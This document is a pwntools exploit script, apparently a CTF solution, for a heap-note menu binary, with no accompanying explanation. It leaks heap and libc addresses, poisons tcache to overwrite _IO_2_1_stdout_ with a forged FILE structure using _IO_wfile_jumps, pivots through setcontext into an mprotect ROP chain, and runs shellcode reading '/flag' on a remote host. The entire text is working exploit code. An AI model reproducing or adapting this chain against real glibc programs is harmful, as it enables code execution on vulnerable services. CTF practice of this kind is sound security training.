1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116
| from pwn import* elf = ELF('pwn')
libc = ELF('libc.so.6')
global p
context.log_level = 'debug' context.arch = 'amd64'
def add(size, content): p.sendlineafter(b'>>', b'1') p.sendlineafter(b':', str(size).encode()) p.sendlineafter(b':', content)
def delete(idx): p.sendlineafter(b'>>', b'2') p.sendlineafter(b':', str(idx).encode())
def edit(idx, content): p.sendlineafter(b'>>', b'3') p.sendlineafter(b':', str(idx).encode()) p.sendlineafter(b':', content)
def show(idx): p.sendlineafter(b'>>', b'4') p.sendlineafter(b':', str(idx).encode())
def exp(): add(0x300, b'a') for i in range(4): add(0x310, b'a') for i in range(5): delete(i)
show(4) p.recvuntil(b'\n') heap_addr = u64(p.recvuntil(b'\n', drop=True).ljust(8, b'\x00')) - 0x30780
add(8, b'a') delete(5) edit(4, p64(heap_addr + 0x2c0)) add(0x310, b'a') add(0x310, p64(heap_addr + 0x240)) p.sendlineafter(b'>>', b'1') p.sendlineafter(b':', b'0') show(7) leak = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) libcbase = leak - 0x22820 - 0x1f4000 + 2 * 0x1000 print(hex(heap_addr))
for i in range(4): add(0x400, b'a') for i in range(4): delete(i + 9)
IO_2_1_stdout = libcbase + libc.sym['_IO_2_1_stdout_'] IO_wfile_jumps = libcbase + libc.sym['_IO_wfile_jumps'] pop_rdi_ret = libcbase + 0x23b6a pop_rsi_ret = libcbase + 0x2601f pop_rdx_ret = libcbase + 0x142c92 magic_gadget = libcbase + 0x151990
faker_addr = heap_addr + 0x50c80 payload = p64(0) * 4 + p64(libcbase + libc.sym['setcontext'] + 61) payload = payload.ljust(0xa0, b'\x00') payload += p64(faker_addr + 0x100) + p64(pop_rdi_ret + 1) payload = payload.ljust(0x100, b'\x00')
payload += flat( pop_rdi_ret, ((faker_addr + 0x100) >> 12) << 12, pop_rsi_ret, 0x2000, pop_rdx_ret, 7, libcbase + libc.sym['mprotect'], faker_addr + 0x140 ) payload += asm(shellcraft.cat('/flag'))
edit(12, p64(IO_2_1_stdout)) add(0x400, payload)
fake_IO_FILE = p64(0) + p64(heap_addr + 0x50c80) fake_IO_FILE += p64(0) * 6 fake_IO_FILE += p64(1) + p64(0) fake_IO_FILE += p64(heap_addr) fake_IO_FILE += p64(magic_gadget) fake_IO_FILE = fake_IO_FILE.ljust(0x68, b'\x00') fake_IO_FILE += p64(0) fake_IO_FILE = fake_IO_FILE.ljust(0x88, b'\x00') fake_IO_FILE += p64(heap_addr + 0x500) fake_IO_FILE = fake_IO_FILE.ljust(0xa0, b'\x00') fake_IO_FILE += p64(IO_2_1_stdout + 0x30) fake_IO_FILE = fake_IO_FILE.ljust(0xc8, b'\x00') fake_IO_FILE += p64(0) fake_IO_FILE = fake_IO_FILE.ljust(0xd8, b'\x00') fake_IO_FILE += p64(IO_wfile_jumps + 0x10) fake_IO_FILE += p64(0) * 6 fake_IO_FILE += p64(IO_2_1_stdout + 0x40)
print(hex(libcbase)) add(0x400, fake_IO_FILE) p.interactive()
p = remote('123.60.179.52',30191)
exp() p.close()
|